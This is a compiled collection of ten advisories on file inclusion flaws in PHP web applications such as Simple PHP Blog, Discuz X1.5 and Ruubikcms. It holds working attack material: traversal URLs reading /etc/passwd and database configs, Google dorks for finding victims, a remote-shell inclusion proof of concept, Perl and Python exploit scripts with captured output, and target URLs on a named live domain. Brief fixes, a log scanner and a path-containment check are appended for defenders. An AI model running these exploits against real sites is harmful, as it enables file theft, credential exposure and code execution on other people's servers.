Manhali v1.8 Local File Inclusion Flaw and Fix (10 articles in total) was contributed by the user "弯了的雨"; below is the editor's compilation of Manhali v1.8 Local File Inclusion Flaw and Fix, for reference only, in the hope that it helps.
Article 1: Manhali v1.8 Local File Inclusion Flaw and Fix
Title: Manhali v1.8 Local File Inclusion Vulnerability
Author: L0n3ly-H34rT l0n3ly_h34rt@hotmail.com
Developer: www.manhali.com/
Download: sourceforge.net/projects/manhali/files/manhali_1.8.zip/download
Affected version: 1.8 (older versions may also be affected; not checked)
Tested on: Linux/Windows
############################################
# P.O.C :
/manhali/includes/download.php?f=../includes/dbconfig.php
############################################
# Greetz to my friendz
Article 2: Media In Spot CMS Local File Inclusion Flaw and Fix
#Name : Media In Spot LFI Vulnerability
#Date : May,16
#Vendor Url : http://www.mediainspot.com/
#Dork : "Powred By Media In Spot"
#Author : wlhaan haker
#############################################################
Exploit:
server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################
Fix:
demo
/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
Fix: filter the parameter.
Article 3: Media In Spot CMS Local File Inclusion Flaw and Fix (Vulnerability Alert)
#Name : Media In Spot LFI Vulnerability
#Date : May,16 2011
#Vendor Url : http://www.mediainspot.com/
#Dork : "Powred By Media In Spot"
#Author : wlhaan haker
#############################################################
Exploit:
server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################
Fix:
demo
www.badguest.cn/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
www.badguest.cn/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
www.badguest.cn/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
Fix: filter the parameter.
Article 4: Ruubikcms v1.1.0 File Inclusion Flaw and Fix
Technical analysis:
Source of /extra/image.php:
if (!isset($_GET['f']) OR empty($_GET['f'])) die("Please specify image.");
$fpath = BASE_DIR.$_GET['f'];   // user input is appended to the base directory; nothing stops '../'
if (!is_file($fpath)) die("File does not exist.");   // only checks existence, not containment

// file size in bytes
// $fsize = filesize($fpath);

// get mime type
$mtype = '';

if (function_exists('mime_content_type')) {
    $mtype = mime_content_type($fpath);
} elseif (function_exists('finfo_file')) {
    $finfo = finfo_open(FILEINFO_MIME); // return mime type
    $mtype = finfo_file($finfo, $fpath);
    finfo_close($finfo);
}

if ($mtype == '') {
    $mtype = "image/jpeg";
}

header("Content-type: $mtype");
readfile($fpath); // <--------------------- LFI: whatever path survived is_file() is sent back verbatim
Test method:
/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../boot.ini
/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../[localfile]
Fix: filter the parameter.
Article 5: Nodesforum 1.059 Remote File Inclusion Flaw and Fix
# Exploit Title: nodesforum 1.059 Remote File Inclusion Vulnerability
# Google Dork: inurl: powered by Nodesforum
# Date: 6/23/
# Author: bd0rk ( bd0rk[at]hackermail.com )
# Software-Download: home.nodesforum.com/download?file=nodesforum_1.059_with_bbcode_1.004.zip
# Tested on: Ubuntu-Linux / WinVista
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code in 3rd_party_limits.php line 6 - 8
--------------------------------------------------------------------------------------------------------------
$limits_cache_url=$_nodesforum_code_path."cache/".$_nodesforum_db_table_name_modifier."_3rd_party_limits.php";
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time()-(24*3600*14)))
{include($limits_cache_url);}
The variable $limits_cache_url is built from the other variable $_nodesforum_code_path,
so we can use the latter.
PoC: /nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]
Fixtip: Declare $_nodesforum_code_path, likewise!
Greetings: Kathrin J., Perle, x0r_32 and ZUBAIR ANJUM ;-)
#### The 22 years old, german Hacker bd0rk #### <---white-hat
Article 6: Simple PHP Blog <= 0.5.1 Local File Inclusion Flaw
=============================================
INTERNET SECURITY AUDITORS ALERT -005
- Original release date: March 2nd, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.8/10 (CVSS scored)
=============================================
I. VULNERABILITY
-------------------------
Simple PHP Blog <= 0.5.1 Local File Include vulnerability
II. BACKGROUND
-------------------------
Simple PHP Blog is a blog system that does not require a database setup and
is very easy to install.
III. DESCRIPTION
-------------------------
Simple PHP Blog <= 0.5.1 is affected by a Local File Include
vulnerability in languages_cgi.php because the blog_language1 parameter
is not properly sanitized.
IV. PROOF OF CONCEPT
-------------------------
The affected code:
62 require_once('languages/' . $_POST['blog_language1'] . '/strings.php');
Exploit:
#!/usr/bin/perl
# Local File Include Exploit
# Simple PHP Blog <= 0.5.1
# jgaliana isecauditors=dot=com
# Internet Security Auditors
use LWP::UserAgent;
use HTTP::Request;
# arguments: host, blog path, local file to read, session id used for the sid cookie
if ($#ARGV < 3) { die("Usage: $0 <host> <path> <file> <sid>\n"); }
$ua = LWP::UserAgent->new;
$ua->agent("Simple PHP Blog Exploit ^_^");
$ua->default_header(Cookie => "sid=$ARGV[3]");
my $req = new HTTP::Request POST =>
    "http://$ARGV[0]$ARGV[1]/languages_cgi.php";
$req->content_type('application/x-www-form-urlencoded');
$req->content("blog_language1=../../../../..$ARGV[2]%00");
my $res = $ua->request($req);
if ($res->is_success) {
    print $res->content;
} else {
    print "Error: " . $res->status_line . "\n";
}
$ perl simple.pl example.com /blog /etc/passwd
root:*:0:0:root:/root:/bin/bash
The bug can be exploited with or without magic_quotes_gpc, but note
that if magic_quotes_gpc is set to Off, an attacker can view any file by
appending a null character (the %00 in the exploit above) to a path such as
/etc/passwd; if it is On, only PHP files can be included, which still
allows executing any local PHP file.
V. BUSINESS IMPACT
-------------------------
The impact is the attacker can read arbitrary files in the context of
the webserver and execute arbitrary local php scripts.
VI. SYSTEMS AFFECTED
-------------------------
Versions prior to and including 0.5.1 are affected.
In order to patch the application, the functions file_exists() and
basename() must be added to the affected code.
VII. SOLUTION
-------------------------
Change line 62 of languages_cgi.php in order to filter the
$_POST['blog_language1'] variable.
// ereg() was removed in PHP 7; preg_match('/^[a-zA-Z0-9_]+$/', ...) performs the same check
if (ereg('^[a-zA-Z0-9_]+$', $_POST['blog_language1']))
    require_once('languages/' . $_POST['blog_language1'] . '/strings.php');
VIII. REFERENCES
-------------------------
www.simplephpblog.com
sourceforge.net/projects/sphpblog/
www.isecauditors.com
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
-------------------------
March 02, 2009: Initial release.
December 18, 2009: Last revision.
XI. DISCLOSURE TIMELINE
-------------------------
March 02, 2009: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 03, 2009: Notified to developer. No response.
December 13, 2009: Notified again. No response.
December 18, 2009: Added mitigation solution and sent to lists.
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied “as-is”
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
Article 7: Pulse CMS Basic Local File Inclusion Vulnerability and Fix
Pulse CMS Basic is a simple content management system. In Pulse CMS Basic versions before 1.29, the index.php file has a local file inclusion vulnerability that may lead to sensitive information disclosure.
[+]info:
~~~~~~~~~
'Pulse CMS Basic' Local File Inclusion Vulnerability
Mark Stanislav - mark.stanislav@gmail.com
CVE-2010-4330
[+]poc:
~~~~~~~~~
www.example.com/index.php?p=/../../../../../../../../../../../../../../etc/passwd%00
[+]Reference:
~~~~~~~~~
www.uncompiled.com/2010/12/pulse-cms-basic-local-file-inclusion-vulnerability-cve-2010-4330/
Article 8: mobile9 Local File Inclusion Vulnerability
Because it is base64-encoded, manual testing is tedious, so I wrote a small tool; experts, feel free to skip.
import sys
import httplib
import base64
import time

if len(sys.argv) < 4:
    print "=" * 30
    print "mobile9.com local exploit by cnb|rd Qq:441303228"
    print "Email:Linuxrootkit@gmail.com"
    print "=" * 30
    print "usage: " + sys.argv[0] + " hostname path localfile"
    sys.exit(1)

host = sys.argv[1]
path = sys.argv[2]
local_file = sys.argv[3]

# grab the server banner with a HEAD request first
conn = httplib.HTTPConnection(host)
conn.request("HEAD", path, headers={"Host": host})
resp = conn.getresponse()
print "=" * 30
print host + " Server Banner is " + str(resp.getheader("Server"))
print "=" * 30
conn.close()
print "Local file to read is " + local_file

# content_delivery.php expects key = urlsafe base64 of "file|timestamp|"
now = int(time.time())
serverpath = "/download/content_delivery.php?key="
plain = local_file + "|" + str(now) + "|"
print plain
base64file = base64.urlsafe_b64encode(plain)
requestpath = serverpath + base64file
print base64file
print requestpath

conn = httplib.HTTPConnection(host)
conn.request("GET", requestpath)
print conn.getresponse().read()
conn.close()
CSDN blog: cnbird2008
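Added here as a defender-side example, not code from cnbird's tool or from any advisory on this page: a Python scanner that flags the request patterns these posts share (`../` traversal, `%00` truncation, remote URLs in include parameters) in access-log lines, and base64-decodes mobile9's `key=` value so traversal hidden inside it is visible too. The log lines are constructed for the example; the `file|timestamp|` layout follows the tool above.

```python
import base64
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TRAVERSAL = re.compile(r"(^|[/\\])\.\.([/\\]|$)")  # ../ anywhere, incl. prefix/../ (Discuz sortid)
REMOTE = re.compile(r"^(https?|ftp|php|data)://", re.I)  # RFI and PHP stream wrappers (Nodesforum)

def classify_value(value):
    """Reasons a URL-decoded parameter value looks like an LFI/RFI attempt."""
    v = unquote(value)  # decode a second time so double-encoded payloads are seen too
    reasons = []
    if "\x00" in v:
        reasons.append("null byte")  # %00 truncation (Simple PHP Blog, Pulse CMS)
    if TRAVERSAL.search(v):
        reasons.append("directory traversal")
    if REMOTE.match(v):
        reasons.append("remote include")
    return reasons

def decode_mobile9_key(value):
    """mobile9's key= is urlsafe_b64('file|timestamp|'); return the file part, else None."""
    try:
        raw = base64.urlsafe_b64decode(value + "=" * (-len(value) % 4))
    except ValueError:  # binascii.Error is a ValueError
        return None
    parts = raw.decode("utf-8", "replace").split("|")
    return parts[0] if len(parts) >= 3 else None

def scan_request_line(line):
    """Return (path, param, reason) tuples for one combined-format access-log line."""
    m = re.search(r'"(?:GET|POST|HEAD) (\S+) HTTP/', line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    findings = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        inner = decode_mobile9_key(value) if name == "key" else None
        for c in [value] + ([inner] if inner is not None else []):
            findings.extend((url.path, name, r) for r in classify_value(c))
    return findings

_KEY = base64.urlsafe_b64encode(b"../../../../etc/passwd|1300000000|").decode()  # constructed
SAMPLE_LOG = [  # constructed lines mirroring this page's PoCs; not real traffic
    '198.51.100.7 - - [16/May/2011:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '198.51.100.7 - - [16/May/2011:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1024',
    '198.51.100.7 - - [16/May/2011:10:00:03 +0000] "GET /bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc HTTP/1.1" 200 88',
    '198.51.100.7 - - [16/May/2011:10:00:04 +0000] "GET /pulse/index.php?p=/../../../etc/passwd%00 HTTP/1.1" 200 1024',
    '198.51.100.7 - - [16/May/2011:10:00:05 +0000] "GET /download/content_delivery.php?key=' + _KEY + ' HTTP/1.1" 200 1024',
]
```

Running `scan_request_line` over `SAMPLE_LOG` flags lines 2 to 5 and leaves the plain `page=about` request alone.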
Article 9: ECMall Local File Inclusion Vulnerability
by Ryat
bbs.wolvez.org
respond.php, line 48:
$pay_code = !empty($_REQUEST['code']) ? trim($_REQUEST['code']) : '';
...
$plugin_file = ROOT_PATH . '/includes/payment/' . $pay_code . '.php';  // request-controlled name, only trimmed
if (is_file($plugin_file))
{
    include_once($plugin_file);
}
An obvious bug.
For exploitation one can follow an idea flyh4t mentioned earlier [bbs.wolvez.org/topic/56/]:
get a shell through another site on the same server, write a main.php into /tmp, then include it.
Article 10: Discuz X1.5 Local File Inclusion Vulnerability Alert
Discuz X1.5 has a local file inclusion; it is conditional, of course: files must be in use as the cache backend, i.e. in config_global.php:
$_config['cache']['type'] = 'file';
function cachedata($cachenames) {
    ......
    $isfilecache = getglobal('config/cache/type') == 'file';
    ......
    if($isfilecache) {
        $lostcaches = array();
        foreach($cachenames as $cachename) {
            // a cache name containing '../' walks out of data/cache (see the sortid PoC below)
            if(!@include_once(DISCUZ_ROOT.'./data/cache/cache_'.$cachename.'.php')) {
                $lostcaches[] = $cachename;
            }
        }
        ......
    }
}
Address:
localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
Authracation has expiried
The code of the api/uc.php page was executed.
Author: Jannock
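Every advisory above ends with the same advice, filter the input; the check that actually does it is made on the resolved path, not on the raw parameter. The Python below is an added example rather than code from any of these projects (base directories are placeholders): `resolve_under_base` is the containment check that image.php (Article 4) and the Discuz cache loader (Article 10) lack, and `language_strings_path` is the allowlist approach of the Simple PHP Blog fix (Article 6).

```python
import os
import re

# Allowlist for values that select a file or directory, as in the languages_cgi.php fix.
NAME_RE = re.compile(r"[A-Za-z0-9_]+")


def resolve_under_base(base_dir, user_path):
    """Resolve user_path inside base_dir; return the absolute path, or None if it escapes.

    Prefixing BASE_DIR and testing is_file(), as image.php does, does not stop '../'
    from walking out of the tree, so the decision has to be made on the resolved path.
    base_dir is a placeholder supplied by the caller."""
    if "\x00" in user_path or os.path.isabs(user_path):
        return None  # %00 truncation and absolute paths both bypass a string prefix
    base = os.path.realpath(base_dir)
    # realpath folds '..' lexically even for components that do not exist, so
    # 'ygjgj/../../../api/uc' (the Discuz X1.5 sortid trick) is still caught.
    target = os.path.realpath(os.path.join(base, user_path))
    return target if os.path.commonpath([base, target]) == base else None


def language_strings_path(base_dir, language):
    """Allowlist variant for a value that names a directory (blog_language1).

    fullmatch is used deliberately: '$' in ereg/preg would still accept a trailing newline."""
    if not NAME_RE.fullmatch(language):
        return None
    return os.path.join(base_dir, "languages", language, "strings.php")
```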